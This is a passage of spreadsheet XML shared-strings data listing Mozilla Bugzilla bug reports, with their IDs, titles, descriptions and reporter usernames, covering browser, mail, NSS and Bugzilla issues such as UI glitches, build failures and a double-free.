    <t>Clicking on scrollbars in autocomplete drop down fails to scroll</t>
  </si>
  <si>
    <t>Instead we dismiss the auto complete window and select what was already
selected. This means you cannot scroll the list of possible selections using the
scroll bar and scrollbar buttons. 
I bet this effects mozilla too.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-523005</t>
  </si>
  <si>
    <t>[fy-NL] Fennec (Firefox mobile) Web localization</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-201641</t>
  </si>
  <si>
    <t>qantas.com.au - CSS file sent as application/x-pointplus</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.3) Gecko/20030312
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.3) Gecko/20030312
Reproducible: Always
Steps to Reproduce:
1. go to www.qantas.com.au
Actual Results:  
Warning: The stylesheet http://www.qantas.com.au/styles/regions/home.css was
loaded as CSS even though its MIME type application/x-pointplus is not
text/css.
Warning: The stylesheet http://www.qantas.com.au/styles/base.css was loaded as
CSS even though its MIME type application/x-pointplus is not text/css.</t>
  </si>
  <si>
    <t>FIREFOX-325286</t>
  </si>
  <si>
    <t>Don't unnecessarily load favicon</t>
  </si>
  <si>
    <t>The favicon service loads favicons way more than it should. It is currently hooked in the same way the URL bar favicon thingy is. The result is that every time you change tabs it will reload the favicon (probably from cache) save it in the DB and fire a bunch of observers which will redraw trees update the toolbar etc.
We currently do it in browser.js:PageProxySetIcon. We should hook up favicon notifications further upstream.
Further it would be nice to have some policy where we don't keep having to reload the favicon data if we've loaded it recently for the same page or another page with the same favicon.</t>
  </si>
  <si>
    <t>FIREFOX-462606</t>
  </si>
  <si>
    <t>Buttons in notification bars are aqua instead of metal</t>
  </si>
  <si>
    <t>Created attachment 345809
Notification bar buttons in Firefox 3 and the nightly build
See the attached screen shot for the issue.  Not sure when this regressed but it was probably very recently.</t>
  </si>
  <si>
    <t>CORE-21900</t>
  </si>
  <si>
    <t>document.lastModified on local disk file yields %#c</t>
  </si>
  <si>
    <t>doucment.writeln(document.lastModified) and alert(document.lastModified) on
local disk file yielded the string %#c
(c.f. Navigator 4.7 [Mac PPC HFS+] yields an incorrect date in the 1920s for
same code).</t>
  </si>
  <si>
    <t>KerryGinn</t>
  </si>
  <si>
    <t>JSS-205066</t>
  </si>
  <si>
    <t>double-free in PK11KeyGenerator.c:constructSHA1PBAKey()</t>
  </si>
  <si>
    <t>keyBits = PBE_GenerateBits(pbeCtxt)
PBE_GenerateBits() just returns the argument that was passed to it. So
pbeCtxt==keyBits. In the finish: block we free them both which is a double
free. We should only free pbeCtxt.</t>
  </si>
  <si>
    <t>FIREFOX-262800</t>
  </si>
  <si>
    <t>Credits start to scroll before activated</t>
  </si>
  <si>
    <t>When viewing Help | About Mozilla Firefox if you wait for about 5 seconds
before clicking the Credits button the credits crawl will have started
scrolling already in the background. It then restarts but the jump is noticable
and irksome. Can't we just start it when that pane is switched to?</t>
  </si>
  <si>
    <t>piratepenguin</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-294816</t>
  </si>
  <si>
    <t>Plugins can't define stringbundles for their preferences which throws warnings when the plugin is loaded</t>
  </si>
  <si>
    <t>cz:   WARNING: !!! Preference without label: PreferenceNameHere
cz:   WARNING: Preference without help text: PreferenceNameHere
Is thrown for each and every pref because plugins are unable(*) to define help
or label information for their prefs. Plugins should be given the opportunity to
define a stringbundle for their preferences the same way they can for commands -
by adding a stringBundle property to the array of prefs / commands. This should
allow plugin developers to define stringbundles in order to get rid of the warnings.
(*) Hacks are possible but rather bizarre and hard to read / debug. Thanks to
Silver anyway for coming up with one :-)</t>
  </si>
  <si>
    <t>WEBSITES_GRAVEYARD-507142</t>
  </si>
  <si>
    <t>need more detailed requirement/error text for bookmarks page</t>
  </si>
  <si>
    <t>Created attachment 391345
screenshot
currently it seems we have as requirement for the Website section of the bookmarks page a http://www.whateversite.com because just www.whateversite.com is marked as error (see screenshot).
Maybe we should also allow www.url.com or we give a more detailed error or requirement text for the Website section since the error is not so obvious.</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-364231</t>
  </si>
  <si>
    <t>on tinderbox xulrunner linux build fails because of gnomevfs</t>
  </si>
  <si>
    <t>Tinderbox show a fail during the build of Xulrunner under linux. It fails during the linkage stage of the libxul apparently because of gnomevfs :
../../dist/lib/libgtkembedmoz.a(EmbedGlobalHistory.o)(.text+0x39): In function `close_file_handle(void*)':
: undefined reference to `gnome_vfs_close'
../../dist/lib/libgtkembedmoz.a(EmbedGlobalHistory.o)(.text+0x84): In function `file_handle_uri_exists(void const*)':
: undefined reference to `gnome_vfs_uri_exists'
../../dist/lib/libgtkembedmoz.a(EmbedGlobalHistory.o)(.text+0xd6): In function `file_handle_uri_new(char const*)':
: undefined reference to `gnome_vfs_uri_new'
../../dist/lib/libgtkembedmoz.a(EmbedGlobalHistory.o)(.text+0x12a): In function `file_handle_create_uri(void* void const*)':
: undefined reference to `gnome_vfs_create_uri'
../../dist/lib/libgtkembedmoz.a(EmbedGlobalHistory.o)(.text+0x181): In function `file_handle_open_uri(void* void const*)':
: undefined reference to `gnome_vfs_open_uri'
../../dist/lib/libgtkembedmoz.a(EmbedGlobalHistory.o)(.text+0x1e2): In function `file_handle_seek(void* int)':
: undefined reference to `gnome_vfs_seek'
../../dist/lib/libgtkembedmoz.a(EmbedGlobalHistory.o)(.text+0x238): In function `file_handle_truncate(void*)':
: undefined reference to `gnome_vfs_truncate_handle'
../../dist/lib/libgtkembedmoz.a(EmbedGlobalHistory.o)(.text+0x290): In function `file_handle_file_info_block_size(void*)':
: undefined reference to `gnome_vfs_get_file_info_from_handle'
../../dist/lib/libgtkembedmoz.a(EmbedGlobalHistory.o)(.text+0x2f9): In function `file_handle_read(void* void* unsigned long long)':
: undefined reference to `gnome_vfs_read'
../../dist/lib/libgtkembedmoz.a(EmbedGlobalHistory.o)(.text+0x384): In function `file_handle_write(void* void*)':
: undefined reference to `gnome_vfs_write'
Perhaps the gnome_vfs library is missing ? Or is this a wrong installed version of gnome_vfs ? Or a wrong mozconfig ? or other things ?</t>
  </si>
  <si>
    <t>CORE-524361</t>
  </si>
  <si>
    <t>Intermittent failure in test_bug299673-2.html</t>
  </si>
  <si>
    <t>http://tinderbox.mozilla.org/showlog.cgi?log=Firefox-Unittest/1256467432.1256468381.11725.gz#err0
OS X 10.5.2 mozilla-central test mochitests-1/5 on 2009/10/25 03:43:52  
29654 ERROR TEST-UNEXPECTED-FAIL | /tests/content/events/test/test_bug299673-2.html | unexpected events - got  :  Test with browser.link.open_newwindow = 3\nSELECT(Select1): focus \nSELECT(Select1): change \n :  &gt;&gt;&gt; OpenWindow\n: blur top-doc\nINPUT(popupText1): focus \n :  &gt;&gt; OpenWindow\n: blur top-doc\nINPUT(popupText1): focus \n :  &lt;&lt;&lt; OpenWindow\nSELECT(Select1): blur \nINPUT(popupText1): blur \n: blur popup-doc\n: focus top-doc\n</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-134247</t>
  </si>
  <si>
    <t>abc.es - sends NS4 CSS to Mozilla</t>
  </si>
  <si>
    <t>www.abc.es the online edition of a major Spanish newspaper detects mozilla as
NS4 and sends a simplified CSS files. As a consequence mozilla users do not
enjoy the same browsing expoerience as IE users do.
The faulty inline javascript is :
if(document.all)
	{
document.write('')
	}
	else
	{
document.write('')
	}
Here are the addresses I found :
atencionlector@abc.es  general purpose address
internet@abc.es to send comments about the Internet section of the magazine
(they light be more concerned about their web site design issues)</t>
  </si>
  <si>
    <t>CORE-340542</t>
  </si>
  <si>
    <t>SVG Consolidate functionality to get primary frame</t>
  </si>
  <si>
    <t>Lots of methods in svg/content classes need to get the primary frame. We should have a single implementation as nsGenericHTMLElement does.</t>
  </si>
  <si>
    <t>CORE-463153</t>
  </si>
  <si>
    <t>TM: Read barrier for global object properties</t>
  </si>
  <si>
    <t>This is necessary for the same reason as the cx-&gt;fp read barrier bug 460865.
The idea is:
* add a run-time check in JSAPI functions that read/write object properties
* add a run-time check in natives that access object properties
* no check needed within the interpreter
If you're on trace (executing or recording) and the object being accessed is in fact the global object the check would bump you off trace.  The global frame would be flushed and so forth.  The property access would then proceed without error.
I could add DEBUG_jason-only assertions to the appropriate OBJ_*_PROPERTY() macros to check the coverage of these runtime checks.
Is there a better alternative I'm missing?</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-208673</t>
  </si>
  <si>
    <t>download does not work on a password protected site that uses javascript</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.3.1) Gecko/20030425
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.3.1) Gecko/20030425
(1)  I have to click twice on the submit buttons on this page.
(2)  Once logged in I get an error message (filename) could not be saved
because the source file could not be read when attempting to download a file.
This site worked OK last week when I was using Mozilla 1.0.  I upgraded to 1.3
to use another site that works with 1.3 but not 1.0.  The planetaec site worked
with Internet Explorer 4.0 today so I am convinced this is a Mozilla problem
(maybe the way it is set up on my computer) but not a site problem.
Reproducible: Always
Steps to Reproduce:
1.go to planetaec.com
2.click on risk management on the right menu bar
3.click resource publications on the right
4.click on any document link.  I used terms and conditions review guide.
5.if logged in to the site with a password first the pdf download screen comes
up then immediately it is eclipsed by an error window that says (filename)
could not be saved because the source file could not be read.
6.click on OK and the error and the download window close.  I can't download
the file.
Actual Results:  
The download window closed.  
Expected Results:  
The download window should have stayed in the foreground and let me choose
whether to open or save the file.</t>
  </si>
  <si>
    <t>u100261</t>
  </si>
  <si>
    <t>CORE-378665</t>
  </si>
  <si>
    <t>Move constructing mDocElementContainingBlock from ConstructRootFrame to ConstructDocElementFrame</t>
  </si>
  <si>
    <t>This is a continuation Bug 370952 (see Bug 370952 comment 0). I decided to split the proposed changes into multiple patches to make it easier to review.  This bug covers the frame constructor changes required. After this there will be one more part to fix InitialReflow.
The changes in this bug will also fix a rather obscure bug with changing between XUL and non-XUL root elements (XUL expects a box frame as a container while non-XUL expects a canvas frame as a container.)</t>
  </si>
  <si>
    <t>TOOLKIT-340715</t>
  </si>
  <si>
    <t>Replace deprecated preventBubble() on MOZILLA_1_8_BRANCH</t>
  </si>
  <si>
    <t>Running Sunbird (build from MOZILLA_1_8_BRANCH) I got the following warning:
Warning: Event=command use of preventBubble() is deprecated. Use W3C standard stopPropagation() instead. This seems to be caused by /toolkit/content/widgets/textbox.xml line 280. 
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/toolkit/content/widgets/textbox.xml&amp;rev=1.21.4.6&amp;mark=280#272</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-511602</t>
  </si>
  <si>
    <t>import labs'/myk's StringBundle.js JS module into mailnews/core/utils</t>
  </si>
  <si>
    <t>Created attachment 395530
add StringBundle.js to mailnews/core/utils
We have come to the point where gloda needs to expose extensible parts of itself to the UI.  This means gloda and gloda plugins want an easy way to have localizations happen.
myk's StringBundle.js meets the goal of easy since apart from importing the module getting a string bundle becomes a matter of 'new StringBundle(chrome://messenger/locale/gloda.properties)' or the like.
I believe this had been proposed some time ago but for various reasons it petered out.
The review is really just a sign-off request rather than a review request... snowl and friends have been using the module for a while...
This has to go in mailnews/ because gloda lives there.</t>
  </si>
  <si>
    <t>THUNDERBIRD-305963</t>
  </si>
  <si>
    <t>1.8 Branch Binary Bits Are Too Big</t>
  </si>
  <si>
    <t>The release machine for windows branch builds is generating a thunderbird.exe
that is 300k bigger than the trunk. 
I went back in time to the day we branched and found that when both the trunk
and the branch were the same bits that the release machine for the branch was
still making a binary that was 300K larger than it should be.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-496279</t>
  </si>
  <si>
    <t>LDAP/SVN account creation request for Manoj Kumar Giri</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.0.2) Gecko/2008091816 Red Hat/3.0.2-3.el5 Firefox/3.0.2 GTB5
Build Identifier: 
Hi
I need SVN access to translate Firefox webpages.
Kindly help me in getting my LDAP/SVN account.
Thanks!
Manoj
Reproducible: Always</t>
  </si>
  <si>
    <t>mgiri</t>
  </si>
  <si>
    <t>TESTOPIA-406910</t>
  </si>
  <si>
    <t>The Any Product under the Environment Variables  is not a link</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Build Identifier: 
Under the Environment Variables section there is a tree pattern in which Any Product is marked as a link
Reproducible: Always
Steps to Reproduce:
   1. Go to the page http://landfill.bugzilla.org/testopia_tip/tr_admin_environment.cgi Which is the Environment Variable Administration page of Bugzilla.
   2. Underneath the heading Environment Variables click on the Any Product which appears to be a link.
Actual Results:  
The Any Product appears to be a link
Expected Results:  
The Any Product is not a link. if it is a link it should open a web page</t>
  </si>
  <si>
    <t>NSS-290217</t>
  </si>
  <si>
    <t>Build DBM from sources in the gmake import build method</t>
  </si>
  <si>
    <t>One way to build NSS is to import its dependencies
as pre-built binary components.  I call this the
gmake import build method.
In NSS 3.10 we no longer build DBM as a separate
component.  So NSS's gmake import makefile rule
needs to be updated to reflect this change.</t>
  </si>
  <si>
    <t>BUGZILLA-255428</t>
  </si>
  <si>
    <t>Allow multiple user selection in CC pull downs</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7) Gecko/20040618 Firefox/0.9
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7) Gecko/20040618 Firefox/0.9
The new userselect doesn't allow a person to select multiple CC's for a bug. 
Personally I prefer a free form text field when adding CC's but at least
a multiple selection should be made available.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>CORE-454394</t>
  </si>
  <si>
    <t>[FIX]Slight speedup of the copying code in nsTextFragment</t>
  </si>
  <si>
    <t>Turns out that with gcc at least:
    for (PRUint32 i = 0 i &lt; (PRUint32)aLength ++i) {
      buff[i] = (char)aBuffer[i]
    }
is slower than something like:
    for (const PRUnichar* buffer = aBuffer *end = buffer + aLength
         buffer != end )
      *buff++ = (char)(*buffer++)
This matters for long strings passed to createTextNode (like the dromaeo tests say).</t>
  </si>
  <si>
    <t>CORE-331376</t>
  </si>
  <si>
    <t>nsIDocShellTreeItem and nsIDocShellTreeNode should be merged</t>
  </si>
  <si>
    <t>Right now when traversing a docshell tree you have to use the nodes and every node in turn correspond to an item.  
Boris said we should just put merge these two and let all items have the node methods.</t>
  </si>
  <si>
    <t>tbsaunde+mozbugs</t>
  </si>
  <si>
    <t>BUGZILLA-365508</t>
  </si>
  <si>
    <t xml:space="preserve">admin/versions/create useless </t>
  </si>
  <si>
    <t xml:space="preserve">
[% PROCESS admin/versions/footer.html.tmpl
    no_add_version_link = 1
 %]
[% PROCESS global/footer.html.tmpl %]</t>
  </si>
  <si>
    <t>CORE-355948</t>
  </si>
  <si>
    <t>[FIX] Remove nsIHTMLDocument::WasDomainSet</t>
  </si>
  <si>
    <t>With bug 327109 there are no more consumers.  If someone happens to really need to know this they can ask the principal like the security manager does.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-635820</t>
  </si>
  <si>
    <t>file 13492 is not restartless</t>
  </si>
  <si>
    <t>please deflag it as such. (I can't figure out how to manage files using the django models)</t>
  </si>
  <si>
    <t>CALENDAR-351995</t>
  </si>
  <si>
    <t>No talkback in Mac Sunbird nightlies since Aug 24</t>
  </si>
  <si>
    <t>Something tree-wide changed that broke talkback for Mac on trunk.
Bug 351722 has the gory details.
I've filed our information there but I added this bug since this should block release of 0.3</t>
  </si>
  <si>
    <t>CORE-449281</t>
  </si>
  <si>
    <t>In  warning C4273: 'NS_NewPipe2' : inconsistent dll linkage when without |--enable-libxul|</t>
  </si>
  <si>
    <t>[Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9.1a2pre) Gecko/2008080519 SeaMonkey/2.0a1pre] (home optim default) (W2Ksp4)
{{
.../xpcom/tests/TestPipe.cpp(51) : warning C4273: 'NS_NewPipe2' : inconsistent dll linkage
        ...\dist\include\xpcom\nsIPipe.h(290) : see previous definition of 'NS_NewPipe2'
}}</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-398194</t>
  </si>
  <si>
    <t>pages that identify other help sources for locales around the world</t>
  </si>
  <si>
    <t>as the first step for providing support for non-english speaking firefox users we need to provide some pages with to links to firefox support sites around the world.   The first step for doing that is to create an inventory of any existing sites that might be offering support or help for firefox users.
I looked though firefox 2 help and identified several links to sites that are providing this kind of help and assistance...
FR  http://frenchmozilla.sourceforge.net/
    http://lxr.mozilla.org/l10n-mozilla1.8/source/fr/browser/chrome/help/firefox_welcome.xhtml
NL  http://help.mozbrowser.nl/firefox/
   http://lxr.mozilla.org/l10n-mozilla1.8/source/nl/browser/chrome/help/firefox_welcome.xhtml
CA http://www.mozilla.cat  -  http://www.mozilla-europe.org/ca/products/firefox/
    http://lxr.mozilla.org/l10n-mozilla1.8/source/ca/browser/chrome/help/firefox_welcome.xhtml
CZ  http://www.czilla.cz/podpora/firefox/
    http://lxr.mozilla.org/l10n-mozilla1.8/source/cs/browser/chrome/help/firefox_welcome.xhtm
HU -  http://mozilla.fsf.hu/firefox/
    http://lxr.mozilla.org/l10n-mozilla1.8/source/hu/browser/chrome/help/firefox_welcome.xhtml
fy-NL - http://help.mozbrowser.nl/firefox/
  http://lxr.mozilla.org/l10n-mozilla1.8/source/fy-NL/browser/chrome/help/firefox_welcome.xhtml
hy-AM  - http://www.mozillazine.org/ &amp; http://plugindoc.mozdev.org/ 
   http://lxr.mozilla.org/l10n-mozilla1.8/source/hy-AM/browser/chrome/help/firefox_welcome.xhtml
FI http://www.mozilla.fi/ &amp;     http://www.mozilla.org/support/firefox/
    http://lxr.mozilla.org/l10n-mozilla1.8/source/fi/browser/chrome/help/firefox_welcome.xhtml
sv-SE http://sv-SE.www.mozilla.com/sv-SE/firefox/help/
  http://lxr.mozilla.org/l10n-mozilla1.8/source/sv-SE/browser/chrome/help/firefox_welcome.xhtml
If you know of any additional sites that are providing international help please add to the list.  Once we get a good inventory we can start to set up pages for each locale
-chofmann</t>
  </si>
  <si>
    <t>CORE-499377</t>
  </si>
  <si>
    <t>Store float region on frame</t>
  </si>
  <si>
    <t>We're currently using the float cache to store the float frame's region (i.e. its margin box nsRect). This should be stored on the frame itself.</t>
  </si>
  <si>
    <t>TESTING_GRAVEYARD-396132</t>
  </si>
  <si>
    <t>Minotaur needs to check new Content Handling preferences for default handlers</t>
  </si>
  <si>
    <t>It is entirely feasible that future partner builds or L10N specific builds might use a different default than the standard default for the content/protocol handling pieces.  Minotaur should be updated to check these defaults and compare them during its verification process.</t>
  </si>
  <si>
    <t>SEAMONKEY-383947</t>
  </si>
  <si>
    <t>nsBrowserContentHandler.js leaks nsCommandLine</t>
  </si>
  <si>
    <t>At least that's the best I can tell.  For some reason that component's scope is not unloaded or something (I think that's a known problem with JS components) and we never null out realCmdLine at shutdown... So nsCommandLine shows up in the leak log making other leak debugging more confusing.</t>
  </si>
  <si>
    <t>THUNDERBIRD-414525</t>
  </si>
  <si>
    <t>Manage identities window does not resize correctly.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1.11) Gecko/20071220 Firefox/2.0.0.11
Build Identifier: Mozilla Thunderbird 2.0.0.9
When resizing the window the layout engine does not grow the list view instead it pads the vertical area with blank space.
Reproducible: Always
Steps to Reproduce:
1. Click the Manage Identities... button in account preferences.
2. The resulting window has a list of four identities.
3. Resize the window with the intent to show more entries in the list.
Actual Results:  
The list still only shows four entries however there is a lot of blank space between the string Multiple Identities Support and the list view itself.
Expected Results:  
The list view should grow with the windows size to reveal more entries.</t>
  </si>
  <si>
    <t>bugzilla_at_mozilla</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-505839</t>
  </si>
  <si>
    <t>JS_GetStringChars( JS_ValueToString(...)..) is a bad pattern</t>
  </si>
  <si>
    <t>This pattern can crash xpinstall is the only place which uses this variant. bug 505838 covers the JS_GetStringBytes variant.</t>
  </si>
  <si>
    <t>NSS-66889</t>
  </si>
  <si>
    <t>The import libraries for fort32.dll swft32.dll and nssckbi.dll should not be released.</t>
  </si>
  <si>
    <t>The three loadable PKCS #11 modules fort32.dll
swft32.dll and nssckbi.dll are always loaded
dynamically so we don't need import libraries
for them.  However their import libraries are
built as side effects when we build the DLLs.  I
haven't figured out how to tell the linker NOT
to build the import libraries but it is easy
to tell coreconf not to release the import
libraries.  All we need to do is to unset the make
variable IMPORT_LIBRARY.  I will attach a patch.</t>
  </si>
  <si>
    <t>FIREFOX-274382</t>
  </si>
  <si>
    <t>loading live bookmarks bypasses cache</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
When firefox starts it loads all live bookmarks. The problem is it completely
ignores its own cache when doing so. Moreover it sends:
  Pragma: no-cache
  Cache-Control: no-cache
in http headers thus completely bypassing any proxy that is on the way.
This is a huge waste of bandwidth both ours and server's.
Reproducible: Always
Steps to Reproduce:
1. Subscribe to a live bookmark observe that it has (very often) ETag and/or
(often) Last-Modified header and/or (less often) Cache-Control: max-age header.
2. Start firefox use Live HTPP Headers extension to see what happens
Actual Results:  
All rss feeds are loaded bypassing the cache
Expected Results:  
Firefox sends If-None-Match and If-Modified-Since headers like explained in
HTTP specs and for obvious reasons.</t>
  </si>
  <si>
    <t>syskin2</t>
  </si>
  <si>
    <t>CORE-240754</t>
  </si>
  <si>
    <t>Escape dots in the username and password when canonicalizing URIs</t>
  </si>
  <si>
    <t>Escape the username and password when canonicalizing URIs
This bug is about implementing option 2d from jruderman's proposal here:
http://bugzilla.mozilla.org/show_bug.cgi?id=122445#c68</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-416857</t>
  </si>
  <si>
    <t>Need to roll MDC SVN r10213 live</t>
  </si>
  <si>
    <t>Need to roll this out to MDC.  This changes the breadcrumbs and title-override extensions to output nothing.  We also need to re-enable these two extensions so that this can happen they're currently disabled.
This will resolve the problem of having  displayed at the tops of articles.</t>
  </si>
  <si>
    <t>CORE-83737</t>
  </si>
  <si>
    <t>off-by-one error in nsStatistics.cpp</t>
  </si>
  <si>
    <t>There's an off-by-one error in nsStatistics.cpp that causes us to not print the
last data set. Easy fix. kandrot could you r=?</t>
  </si>
  <si>
    <t>DEVELOPER.MOZILLA.ORG-305341</t>
  </si>
  <si>
    <t>New devmo wiki and wordpress skins need to be installed from cvs</t>
  </si>
  <si>
    <t>I've added the new wiki/wp skins and related files to cvs in the following dirs
under /mozilla-org/...
/wordpress/wp-content/themes/webwatch
/wordpress/wp-content/themes/devnews
/css
/css/images
/wiki/skins/devmo</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-300207</t>
  </si>
  <si>
    <t>Scrollbars in ClearLooks theme do not have rounded corners</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b3) Gecko/20050709 Firefox/1.0+
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b3) Gecko/20050709 Firefox/1.0+
ClearLooks draws rounded corners on its scrollbar buttons. It determines whether
to draw left/top buttons or right/bottom ones by examing the allocation member
of the GtkScrollbar it is drawing. Because the scrollbars passed to gtk_draw_box
have their default allocations this test always fails and the default
non-rounded box is drawn.
Reproducible: Always
Steps to Reproduce:
1. Run Firefox/GTK2 with ClearLooks as the theme
2. Examine the scrollbars
Actual Results:  
The scrollbars have sharp corners.
Expected Results:  
The scrollbars should have rounded corners.</t>
  </si>
  <si>
    <t>randy.eckenrode</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-276156</t>
  </si>
  <si>
    <t>Add 0.9 1.0 Trunk versions to Thunderbird</t>
  </si>
  <si>
    <t>please see description of TB bug #276155</t>
  </si>
  <si>
    <t>BUGZILLA-417030</t>
  </si>
  <si>
    <t>importxml.pl doesn't support custom fields implemented in 3.2</t>
  </si>
  <si>
    <t>Calendar textarea and multi-select fields are not understood by importxml.pl. They shouldn't be too hard to support.</t>
  </si>
  <si>
    <t>NSS-221067</t>
  </si>
  <si>
    <t>NSS needs to be able to create token symkeys from unwrap and derive.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.4) Gecko/20030624 Netscape/7.1 (ax)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.4) Gecko/20030624 Netscape/7.1 (ax)
NSS currently has no way to create token keys when unwrapping or deriving keys
(only key import and generation).
NSS also has not public way to move a key across tokens.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-324096</t>
  </si>
  <si>
    <t>nsXFormsNodeState should work with NS_EVENT constants</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9a1) Gecko/20051212 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9a1) Gecko/20051212 Firefox/1.6a1
http://lxr.mozilla.org/mozilla/source/extensions/xforms/nsXFormsModelElement.cpp#723
XXX: nsXFormsNodeState could expose a bitmask using NS_EVENTs to avoid
most of this...
nsXFormsNodeState can have a method for converting its own constants to NS_EVENTs constants (if ... then ...) to fix the bug. But I don't like a much the approach.
The problem as I can see is nsXFormsNodeState dublicates some nsIEventStateManager constants nsXFormsUtils events constants. Probably is it a better way to remove dublicate constants?
Reproducible: Always</t>
  </si>
  <si>
    <t>BUGZILLA-181106</t>
  </si>
  <si>
    <t>edit-multiple.html.tmpl uses &amp;apos which Internet Explorer cannot use (patch included)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X en-US rv:1.0.1) Gecko/20021112 Chimera/0.6+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X en-US rv:1.0.1) Gecko/20021112 Chimera/0.6+
In the Don't change this group restriction dialog Bugzilla uses &amp;apos instead
of the classic &amp;#39 code for the apostrophe. This makes it literally print &amp;apos
if you are using Internet Explorer 5.X
Reproducible: Always
Steps to Reproduce:
1. Get bug list
2. Change multiple tickets ..
3. See message</t>
  </si>
  <si>
    <t>thomas+mozilla</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-465811</t>
  </si>
  <si>
    <t>[silme] extend list of objects with a uri attribute</t>
  </si>
  <si>
    <t>Created attachment 349030
patch adding 'uri' value to L10nPackages created through getL10nPackages() in io.file.py
Based on a discussion with Gandalf: it would be useful to have the same attribute behavior in all objects which can repesent files or folders.
L10nPackages do have the uri attribute but getL10nPackages() in io.file.py does not set it.
At the moment all of the following diff-objects: EntityListDiff ObjectDiff L10nObjectDiff L10nPackageDiff do not have it.
Adding the uri attribute to them requires us to save both uris. I solved this by saving them in a tuple.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-142643</t>
  </si>
  <si>
    <t>Doctor doesn't escape line break characters properly</t>
  </si>
  <si>
    <t>When transferring form data in hidden form fields from server to client Doctor
escapes newlines as  and carriage returns as .  This is necessary
because the HTML spec says clients should remove line break characters from HTML
attributes.
Doctor doesn't escape the natural occurrence of  and  however which
means that in the unlikely situation that those characters appear in a document
being edited with Doctor those characters will get translated into line break
characters instead of retaining their original meaning.
Doctor should use \n for newlines and \r for carriage returns instead then
escape the backslash character with \\.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-202622</t>
  </si>
  <si>
    <t>mozilla can't subscribe to existing imap folders</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.2.1) Gecko/20030225
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.2.1) Gecko/20030225
When I try to subscribe to existing imap folders I get:
The current command did not succeed. The mail server responded: Cannot
subscribe to this folder..
My imap server is courier-imap 1.7.0 (http://www.inter7.com/courierimap/)
It works to subscribe to existing folders from other mail clients like SquirrelMail.
Strange is that I can see the folder when I choose Subscribe but when I mark
its box and presses OK I get the above error message.
So now I can't manage folders that already exists (e g when created from other
mail clients). Even if I restart Mozilla its the same.
This has been like this for mane versions of Mozilla (I guess it has never
worked) and it does still not work in Mozilla 1.3 (dled from mozilla.org).
Only way to manage existing folders:
1. delete and recreate the folder or
2. delete the mail profile and create it from scratch
Reproducible: Always
Steps to Reproduce:
See above.
Actual Results:  
When I try to subscribe to existing imap folders I get:
The current command did not succeed. The mail server responded: Cannot
subscribe to this folder..
Expected Results:  
Subscribed to the folder so I can manage it.</t>
  </si>
  <si>
    <t>b</t>
  </si>
  <si>
    <t>PENELOPE_GRAVEYARD-516786</t>
  </si>
  <si>
    <t>Mail Window</t>
  </si>
  <si>
    <t>Toolbar buttons for 'back' and 'forward' do not display correctly in customize dialog</t>
  </si>
  <si>
    <t>The problem is that in the Toolbar customization dialog the icons for the back and forward buttons do not display correctly. Instead of displaying as an arrow they display as rectangles.
To reproduce:
- Customize the toolbar
- Click on Go &gt; Forward or Go &gt; Back
- Note that the icon is displayed as a rectangle
- See attached screen shot
Problem present on Windows and Mac. Did not test Linux.</t>
  </si>
  <si>
    <t>NSPR-340956</t>
  </si>
  <si>
    <t>PR_Write in append mode fails for big files (4GB+/32bit border)</t>
  </si>
  <si>
